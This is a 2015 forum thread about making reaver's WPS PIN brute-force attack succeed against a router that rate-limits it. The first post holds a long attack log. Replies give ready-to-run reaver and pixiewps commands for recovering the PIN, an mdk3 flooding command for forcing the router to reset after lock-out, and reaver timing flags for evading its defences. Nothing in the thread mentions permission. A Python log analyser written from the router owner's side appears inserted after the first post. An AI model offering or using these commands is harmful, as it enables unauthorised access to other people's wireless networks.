Topic: reaver - further course of action

flex0r
« on: October 19, 2015, 04:06:05 pm »
Hey folks,

I have a problem with reaver. After a while I get "AP rate limiting". I think I have to change my settings but I don't know how. I hope you can help me. If you think you have interesting tutorials which can help me, feel free to post them.

Thank you in advance for your help!

Code:
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m35s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 4
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 5
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m54s.
[+] Estimated Remaining time: 0d9h9m45s
[+] Trying pin 33335674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 6
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 0.05% complete. Elapsed time: 0d0h1m20s.
[+] Estimated Remaining time: 3d7h24m4s
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 7
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 8
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] 0.07% complete. Elapsed time: 0d0h1m45s.
[+] Estimated Remaining time: 1d12h38m24s
[+] Trying pin 66665670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 9
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 10
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.

« Last Edit: October 19, 2015, 04:07:32 pm by flex0r »
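
Read from the AP owner's side, the transcript above shows the router's WPS lock-out engaging after a run of refused PINs. The following Python is an added example, not part of the original post or of reaver: it tallies a transcript in this format, assuming (as the log suggests) that each "Pin count advanced" line marks one PIN the AP evaluated and refused. The sample lines and the `summarize` helper are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample in the format of the transcript above (not a real capture).
SAMPLE = """\
[+] Trying pin 12345670.
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[!] WARNING: Receive timeout occurred
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 00005678.
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Pin count advanced: 2. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
"""

PIN = re.compile(r"Trying pin (\d{8})\.")
FAIL = re.compile(r"WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)")
ADV = re.compile(r"Pin count advanced: (\d+)\.")
LOCK = "Detected AP rate limiting"

def summarize(log):
    """Summarize one session transcript from the AP owner's point of view."""
    out = {"exchanges": 0, "rejected_pins": 0, "incomplete": Counter(),
           "rejected_before_lock": None, "lock_warnings": 0}
    for line in log.splitlines():
        if PIN.search(line):
            out["exchanges"] += 1                 # every attempt, retries included
        elif (m := FAIL.search(line)):
            out["incomplete"][m.group(1)] += 1    # exchange ended without a verdict
        elif (m := ADV.search(line)):
            out["rejected_pins"] = int(m.group(1))  # assumption: AP refused this PIN
        elif LOCK in line:
            out["lock_warnings"] += 1
            if out["rejected_before_lock"] is None:
                # Refused PINs the AP tolerated before its lock-out engaged
                out["rejected_before_lock"] = out["rejected_pins"]
    return out
```

Run over the transcript in the post, it reports 10 refused PINs before the first rate-limiting warning: the exchanges that timed out (0x02, 0x03) never reached a verdict, and the AP stopped answering once the tenth PIN had been refused.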

proxx
« Reply #1 on: October 19, 2015, 04:12:36 pm »
This simply looks like a router that isn't vuln, not sure who dug you up and why they waited all these years but this attack is considered old and patched for the most part.
« Last Edit: October 19, 2015, 04:13:11 pm by proxx »

flex0r
« Reply #2 on: October 19, 2015, 04:19:52 pm »
But reaver successfully tested some pins? Don't get me wrong, I just want to understand why.

Is there another method to crack wifi passwords?

white-knight
« Reply #3 on: October 19, 2015, 05:52:27 pm »
Spend that money and just get the reaver pro, guaranteed to still not crack shit :o


http://www.reaversystems.com/products/reaver-pro-ii

0E 800
« Reply #4 on: October 19, 2015, 06:09:46 pm »
I have a reaver pro, it's shit. Your reaver IS working. You can see it's trying the pins.
You are just going to have to wait for it to run its course.

I put up a review of Reaver Pro vs ReVdK3-r1 script.

https://www.youtube.com/watch?v=zf93xJ7xD2k

Also worth checking out is HT-WPS-Breaker.
https://github.com/SilentGhostX/HT-WPS-Breaker

proxx
« Reply #5 on: October 19, 2015, 06:27:40 pm »
> But reaver successfully tested some pins? Don't get me wrong, I just want to understand why.
>
> Is there another method to crack wifi passwords?

My bad, I didn't read all the way through.
Try lowering the rate to a few seconds, that does the trick in most cases.
« Last Edit: October 19, 2015, 06:29:07 pm by proxx »

iTpHo3NiX
« Reply #6 on: October 19, 2015, 06:38:56 pm »
Furthermore you can attempt to use reaver with pixiewps, if the router's vulnerable you'll have the WPS pin in no time. Check the link in my signature for my tutorial on using reaver and pixiewps to do an offline bruteforce of the pin.

The short version is to run reaver as:
reaver -i <monitorinterface> -b <targetbssid> -c <channel> -vvv

Stop reaver after you receive ehash2 (M4 message) and then plug in the values for pixiewps: enonce, rnonce, authkey, ehash1, and ehash2. If the router's vulnerable you'll get the pin and then run:
reaver -i <monitorinterface> -b <targetbssid> -c <channel> -vvv --pin=12345678

Biokinetix
« Reply #7 on: January 25, 2016, 12:40:15 pm »
You could try mdk3 to try and reset the router after it locks up or rate limits. Try:

mdk3 wlan1mon a -a <MAC> -m

Unfortunately if it does work, it only resets the router so reaver can have another go but it will do the same again.

Also you can play around with some of reaver's commands. Try the following command which worked for me in the past:

reaver -i wlan1mon -b <AP BSSID> -c <channel number> -a -L --dh-small -vv -d 5

Takes a long time but you should eventually crack it. Hope it helps.